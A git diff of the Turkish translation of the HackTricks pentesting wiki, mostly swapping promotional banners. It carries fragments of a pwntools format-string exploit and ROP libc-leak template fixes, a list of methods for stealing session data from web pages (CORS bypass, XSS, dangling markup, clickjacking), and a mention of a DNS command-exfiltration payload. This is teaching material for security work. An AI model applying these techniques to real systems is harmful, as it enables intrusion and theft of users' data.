-Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin htARTE (HackTricks AWS Red Team Expert)!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
-* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
```python
from pwn import *
from time import sleep
@@ -149,16 +150,17 @@ format_string.execute_writes()
P.interactive()
```
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Red Team Expert)!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.**
-* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
index 0a0e61cdb..f4f06964e 100644
--- a/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -1,16 +1,17 @@
-
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
-<özet>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin htARTE (HackTricks AWS Red Team Expert) ile!özet>
+
-HackTricks'ı desteklemenin diğer yolları:
+HackTricks'i Destekleyin
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
-* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
-
+
+{% endhint %}
{% code title="template.py" %}
@@ -199,11 +200,11 @@ P.interactive() #Interact with your shell :)
```
{% endcode %}
-# Ortak problemler
+# Ortak sorunlar
-## MAIN_PLT = elf.symbols\['main'] bulunamadı
+## MAIN\_PLT = elf.symbols\['main'] bulunamadı
-Eğer "main" sembolü mevcut değilse. O zaman sadece main kodunun nerede olduğunu bulabilirsiniz:
+Eğer "main" sembolü mevcut değilse (muhtemelen çıkarılmış bir ikili dosya olduğu için). O zaman sadece ana kodun nerede olduğunu bulabilirsiniz:
```python
objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
@@ -219,22 +220,23 @@ Eğer ikili dosya Puts kullanmıyorsa, şunu kontrol etmelisin:
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
-Bu **hata**yı tüm saldırıyı oluşturduktan sonra bulursan: `sh: 1: %s%s%s%s%s%s%s%s: not found`
+Bu **hata**yı tüm exploit oluşturduktan sonra bulursan: `sh: 1: %s%s%s%s%s%s%s%s: not found`
-Deneyin ve **"/bin/sh" adresinden 64 bayt çıkarın**:
+Deneyerek **"/bin/sh" adresinden 64 bayt çıkar**:
```python
BINSH = next(libc.search("/bin/sh")) - 64
```
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert)!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
-* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
+{% endhint %}
diff --git a/stealing-sensitive-information-disclosure-from-a-web.md b/stealing-sensitive-information-disclosure-from-a-web.md
index 1ea170e05..f6b82d0cf 100644
--- a/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/stealing-sensitive-information-disclosure-from-a-web.md
@@ -1,37 +1,39 @@
# Web'den Hassas Bilgi Sızdırma
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-AWS hackleme konusunda sıfırdan kahramana dönüşmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!
+HackTricks'i Destekleyin
-HackTricks'i desteklemenin diğer yolları:
-
-* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonunu.
-* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
-* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
-Eğer bir noktada **oturumunuza dayalı olarak size hassas bilgiler sunan bir web sayfası bulursanız**: Belki çerezleri yansıtıyor, veya kredi kartı bilgilerini veya başka hassas bilgileri yazdırıyor, bunu çalmayı deneyebilirsiniz.\
-İşte bunu başarmak için deneyebileceğiniz ana yöntemler:
+Eğer bir noktada **oturumunuza bağlı olarak size hassas bilgiler sunan bir web sayfası bulursanız**: Belki çerezleri yansıtıyor, veya kredi kartı detaylarını yazdırıyor veya başka hassas bilgileri, bunları çalmayı deneyebilirsiniz.\
+İşte bunu başarmak için deneyebileceğiniz temel yolları size sunuyorum:
* [**CORS atlatma**](pentesting-web/cors-bypass.md): CORS başlıklarını atlayabilirseniz, kötü niyetli bir sayfa için Ajax isteği yaparak bilgileri çalabilirsiniz.
-* [**XSS**](pentesting-web/xss-cross-site-scripting/): Sayfada bir XSS zafiyeti bulursanız, bunu kötüye kullanarak bilgileri çalmak mümkün olabilir.
-* [**Dangling Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): XSS etiketlerini enjekte edemiyorsanız, diğer düzenli HTML etiketlerini kullanarak bilgileri çalmak mümkün olabilir.
-* [**Clickjacking**](pentesting-web/clickjacking.md): Bu saldırıya karşı koruma yoksa, kullanıcıyı hassas verileri size göndermeye kandırabilirsiniz (bir örnek [burada](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
+* [**XSS**](pentesting-web/xss-cross-site-scripting/): Sayfada bir XSS zafiyeti bulursanız, bunu kötüye kullanarak bilgileri çalabilirsiniz.
+* [**Dangling Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): XSS etiketleri enjekte edemiyorsanız bile, diğer düzenli HTML etiketlerini kullanarak bilgileri çalabilirsiniz.
+* [**Clickjaking**](pentesting-web/clickjacking.md): Bu saldırıya karşı koruma yoksa, kullanıcıyı hassas verileri size göndermeye kandırabilirsiniz (bir örnek [burada](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
+
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
-AWS hackleme konusunda sıfırdan kahramana dönüşmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!
+HackTricks'i Destekleyin
-HackTricks'i desteklemenin diğer yolları:
-
-* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonunu.
-* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
-* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
diff --git a/todo/6881-udp-pentesting-bittorrent.md b/todo/6881-udp-pentesting-bittorrent.md
index 655e373a3..e45358f66 100644
--- a/todo/6881-udp-pentesting-bittorrent.md
+++ b/todo/6881-udp-pentesting-bittorrent.md
@@ -1,30 +1,14 @@
-
-
-Sıfırdan kahraman olana kadar AWS hackleme için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) öğrenin!
-
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
-* **Hacking püf noktalarınızı göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
-
-
-
-
-
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
-Sıfırdan kahraman olana kadar AWS hackleme için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) öğrenin!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
-* **Hacking püf noktalarınızı göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
+{% endhint %}
diff --git a/todo/burp-suite.md b/todo/burp-suite.md
index 93196a794..f3ff2b901 100644
--- a/todo/burp-suite.md
+++ b/todo/burp-suite.md
@@ -1,43 +1,29 @@
+{% hint style="success" %}
+Öğren ve AWS Hacking pratiği yap:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Öğren ve GCP Hacking pratiği yap:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-Sıfırdan kahraman olmak için AWS hackleme öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
+HackTricks'i Destekle
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin**.
-* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
+* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
+{% endhint %}
-# Temel Yükler
+# Temel Payloadlar
* **Basit Liste:** Her satırda bir giriş içeren bir liste
* **Çalışma Zamanı Dosyası:** Bellekte yüklenmeyen, çalışma zamanında okunan bir liste. Büyük listeleri desteklemek için.
-* **Durum Değişikliği:** Dizelerin bir listesine bazı değişiklikler uygulayın (Değişiklik yapma, küçük harfe çevirme, BÜYÜK HARFE ÇEVİRME, Doğru ad - İlk harf büyük ve geri kalan küçük-, Doğru Ad -İlk harf büyük ve geri kalan aynı kalır-.
+* **Durum Değişikliği:** Bir dizi dizeye bazı değişiklikler uygulayın (Değişiklik yok, küçük harfe, BÜYÜK HARFE, İlk harfi büyük ve geri kalanı küçük olan Proper isim - İlk harfi büyük ve geri kalanı aynı kalan Proper İsim -.
* **Sayılar:** X'ten Y'ye Z adımı kullanarak veya rastgele sayılar oluşturun.
-* **Kaba Kuvvet:** Karakter seti, min ve max uzunluk.
+* **Brute Forcer:** Karakter seti, min ve max uzunluk.
-[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Komutları yürütmek ve çıktıyı burpcollab'a DNS istekleri aracılığıyla almak için yük.
+[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Komutları yürütmek ve çıktıyı burpcollab'a DNS istekleri aracılığıyla almak için Payload.
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
-
-
-
-
-Sıfırdan kahraman olmak için AWS hackleme öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
-
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin**.
-* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
-
-
diff --git a/todo/emails-vulns.md b/todo/emails-vulns.md
index bff8de476..b58f9b978 100644
--- a/todo/emails-vulns.md
+++ b/todo/emails-vulns.md
@@ -1,33 +1,35 @@
# E-posta Güvenlik Açıkları
-
-
-Sıfırdan Kahramana AWS hackleme öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
-
-HackTricks'ı desteklemenin diğer yolları:
-
-* Şirketinizi **HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
-* **Hacking püf noktalarınızı göndererek HackTricks** [**ve HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github depolarına PR'lar gönderin.
-
-
-
-##
-
-##
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
-Sıfırdan Kahramana AWS hackleme öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* Şirketinizi **HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
-* **Hacking püf noktalarınızı göndererek HackTricks** [**ve HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github depolarına PR'lar gönderin.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
+{% endhint %}
+
+##
+
+##
+
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks'i Destekleyin
+
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
+
+
+{% endhint %}
diff --git a/todo/interesting-http.md b/todo/interesting-http.md
index 3fab3ef71..2ebcd959c 100644
--- a/todo/interesting-http.md
+++ b/todo/interesting-http.md
@@ -1,29 +1,29 @@
+{% hint style="success" %}
+AWS Hacking'ı öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'ı öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
-* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
